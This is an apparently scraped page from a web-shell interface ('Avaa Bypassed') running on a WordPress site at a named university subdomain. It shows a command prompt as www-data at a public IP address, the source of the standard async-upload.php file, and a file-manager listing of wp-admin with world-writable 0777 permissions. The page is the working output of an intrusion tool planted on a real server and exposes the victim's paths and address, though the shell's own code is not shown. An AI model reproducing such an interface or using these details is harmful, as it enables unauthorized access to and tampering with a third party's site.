[ Avaa Bypassed ]

Upload:

Command:

www-data@3.137.180.196: ~ $ 
<?php
/**
 * Server-side file upload handler from wp-plupload or other asynchronous upload methods.
 *
 * @package WordPress
 * @subpackage Administration
 */

if ( isset( $_REQUEST['action'] ) && 'upload-attachment' === $_REQUEST['action'] ) {
	define( 'DOING_AJAX', true );
}

if ( ! defined( 'WP_ADMIN' ) ) {
	define( 'WP_ADMIN', true );
}

if ( defined( 'ABSPATH' ) ) {
	require_once ABSPATH . 'wp-load.php';
} else {
	require_once dirname( __DIR__ ) . '/wp-load.php';
}

require_once ABSPATH . 'wp-admin/admin.php';

header( 'Content-Type: text/plain; charset=' . get_option( 'blog_charset' ) );

if ( isset( $_REQUEST['action'] ) && 'upload-attachment' === $_REQUEST['action'] ) {
	require ABSPATH . 'wp-admin/includes/ajax-actions.php';

	send_nosniff_header();
	nocache_headers();

	wp_ajax_upload_attachment();
	die( '0' );
}

if ( ! current_user_can( 'upload_files' ) ) {
	wp_die( __( 'Sorry, you are not allowed to upload files.' ) );
}

// Just fetch the detail form for that attachment.
if ( isset( $_REQUEST['attachment_id'] ) && (int) $_REQUEST['attachment_id'] && $_REQUEST['fetch'] ) {
	$id   = (int) $_REQUEST['attachment_id'];
	$post = get_post( $id );
	if ( 'attachment' !== $post->post_type ) {
		wp_die( __( 'Invalid post type.' ) );
	}

	switch ( $_REQUEST['fetch'] ) {
		case 3:
			?>
			<div class="media-item-wrapper">
				<div class="attachment-details">
					<?php
					$thumb_url = wp_get_attachment_image_src( $id, 'thumbnail', true );
					if ( $thumb_url ) {
						echo '<img class="pinkynail" src="' . esc_url( $thumb_url[0] ) . '" alt="" />';
					}

					// Title shouldn't ever be empty, but use filename just in case.
					$file     = get_attached_file( $post->ID );
					$file_url = wp_get_attachment_url( $post->ID );
					$title    = $post->post_title ? $post->post_title : wp_basename( $file );
					?>
					<div class="filename new">
						<span class="media-list-title"><strong><?php echo esc_html( wp_html_excerpt( $title, 60, '&hellip;' ) ); ?></strong></span>
						<span class="media-list-subtitle"><?php echo wp_basename( $file ); ?></span>
					</div>
				</div>
				<div class="attachment-tools">
					<span class="media-item-copy-container copy-to-clipboard-container edit-attachment">
						<button type="button" class="button button-small copy-attachment-url" data-clipboard-text="<?php echo $file_url; ?>"><?php _e( 'Copy URL to clipboard' ); ?></button>
						<span class="success hidden" aria-hidden="true"><?php _e( 'Copied!' ); ?></span>
					</span>
					<?php
					if ( current_user_can( 'edit_post', $id ) ) {
						echo '<a class="edit-attachment" href="' . esc_url( get_edit_post_link( $id ) ) . '">' . _x( 'Edit', 'media item' ) . '</a>';
					} else {
						echo '<span class="edit-attachment">' . _x( 'Success', 'media item' ) . '</span>';
					}
					?>
				</div>
			</div>
			<?php
			break;
		case 2:
			add_filter( 'attachment_fields_to_edit', 'media_single_attachment_fields_to_edit', 10, 2 );
			echo get_media_item(
				$id,
				array(
					'send'   => false,
					'delete' => true,
				)
			);
			break;
		default:
			add_filter( 'attachment_fields_to_edit', 'media_post_single_attachment_fields_to_edit', 10, 2 );
			echo get_media_item( $id );
			break;
	}
	exit;
}

check_admin_referer( 'media-form' );

$post_id = 0;
if ( isset( $_REQUEST['post_id'] ) ) {
	$post_id = absint( $_REQUEST['post_id'] );
	if ( ! get_post( $post_id ) || ! current_user_can( 'edit_post', $post_id ) ) {
		$post_id = 0;
	}
}

$id = media_handle_upload( 'async-upload', $post_id );
if ( is_wp_error( $id ) ) {
	printf(
		'<div class="error-div error">%s <strong>%s</strong><br />%s</div>',
		sprintf(
			'<button type="button" class="dismiss button-link" onclick="jQuery(this).parents(\'div.media-item\').slideUp(200, function(){jQuery(this).remove();});">%s</button>',
			__( 'Dismiss' )
		),
		sprintf(
			/* translators: %s: Name of the file that failed to upload. */
			__( '&#8220;%s&#8221; has failed to upload.' ),
			esc_html( $_FILES['async-upload']['name'] )
		),
		esc_html( $id->get_error_message() )
	);
	exit;
}

if ( $_REQUEST['short'] ) {
	// Short form response - attachment ID only.
	echo $id;
} else {
	// Long form response - big chunk of HTML.
	$type = $_REQUEST['type'];

	/**
	 * Filters the returned ID of an uploaded attachment.
	 *
	 * The dynamic portion of the hook name, `$type`, refers to the attachment type.
	 *
	 * Possible hook names include:
	 *
	 *  - `async_upload_audio`
	 *  - `async_upload_file`
	 *  - `async_upload_image`
	 *  - `async_upload_video`
	 *
	 * @since 2.5.0
	 *
	 * @param int $id Uploaded attachment ID.
	 */
	echo apply_filters( "async_upload_{$type}", $id );
}

Filemanager

DIR : / var/ www/ dsw.bdu.ac.bd/ public_html/ subdomain/ wp-admin/
Name Type Size Permission Actions
css Folder 0777
images Folder 0777
includes Folder 0777
js Folder 0777
maint Folder 0777
network Folder 0777
user Folder 0777
about.php File 24.38 KB 0777
admin-ajax.php File 4.83 KB 0777
admin-footer.php File 2.76 KB 0777
admin-functions.php File 406 B 0777
admin-header.php File 8.8 KB 0777
admin-post.php File 2 KB 0777
admin.php File 12.26 KB 0777
async-upload.php File 4.56 KB 0777
authorize-application.php File 10.02 KB 0777
comment.php File 11.25 KB 0777
credits.php File 3.69 KB 0777
custom-background.php File 416 B 0777
custom-header.php File 426 B 0777
customize.php File 10.6 KB 0777
edit-comments.php File 13.97 KB 0777
edit-form-advanced.php File 28.36 KB 0777
edit-form-blocks.php File 10.83 KB 0777
edit-form-comment.php File 8.34 KB 0777
edit-link-form.php File 6.16 KB 0777
edit-tag-form.php File 10.41 KB 0777
edit-tags.php File 21.87 KB 0777
edit.php File 19.01 KB 0777
erase-personal-data.php File 7.36 KB 0777
export-personal-data.php File 7.76 KB 0777
export.php File 10.99 KB 0777
freedoms.php File 4.42 KB 0777
import.php File 7.4 KB 0777
index.php File 7.65 KB 0777
install-helper.php File 6.8 KB 0777
install.php File 16.82 KB 0777
link-add.php File 742 B 0777
link-manager.php File 4.16 KB 0777
link-parse-opml.php File 2.59 KB 0777
link.php File 2.7 KB 0777
load-scripts.php File 1.66 KB 0777
load-styles.php File 2.47 KB 0777
media-new.php File 3.18 KB 0777
media-upload.php File 3.49 KB 0777
media.php File 5.49 KB 0777
menu-header.php File 9.82 KB 0777
menu.php File 16.84 KB 0777
moderation.php File 307 B 0777
ms-admin.php File 196 B 0777
ms-delete-site.php File 4.19 KB 0777
ms-edit.php File 216 B 0777
ms-options.php File 223 B 0777
ms-sites.php File 215 B 0777
ms-themes.php File 217 B 0777
ms-upgrade-network.php File 219 B 0777
ms-users.php File 215 B 0777
my-sites.php File 4.65 KB 0777
nav-menus.php File 46.67 KB 0777
network.php File 5.35 KB 0777
options-discussion.php File 15.58 KB 0777
options-general.php File 16.57 KB 0777
options-head.php File 492 B 0777
options-media.php File 6.35 KB 0777
options-permalink.php File 21.09 KB 0777
options-privacy.php File 9.93 KB 0777
options-reading.php File 9.92 KB 0777
options-writing.php File 8.58 KB 0777
options.php File 12.67 KB 0777
plugin-editor.php File 13.13 KB 0777
plugin-install.php File 6.78 KB 0777
plugins.php File 28.6 KB 0777
post-new.php File 2.64 KB 0777
post.php File 9.86 KB 0777
press-this.php File 2.33 KB 0777
privacy-policy-guide.php File 3.61 KB 0777
privacy.php File 2.42 KB 0777
profile.php File 283 B 0777
revision.php File 5.45 KB 0777
setup-config.php File 16.93 KB 0777
site-editor.php File 4.6 KB 0777
site-health-info.php File 3.93 KB 0777
site-health.php File 10.01 KB 0777
term.php File 2.2 KB 0777
theme-editor.php File 14.91 KB 0777
theme-install.php File 23.23 KB 0777
themes.php File 45.64 KB 0777
tools.php File 3.43 KB 0777
update-core.php File 43.86 KB 0777
update.php File 12.43 KB 0777
upgrade-functions.php File 341 B 0777
upgrade.php File 5.54 KB 0777
upload.php File 14.56 KB 0777
user-edit.php File 38.73 KB 0777
user-new.php File 23.69 KB 0777
users.php File 21.36 KB 0777
widgets-form-blocks.php File 2.48 KB 0777
widgets-form.php File 19.05 KB 0777
widgets.php File 1.09 KB 0777

© 2025 Coded By Avaa Code.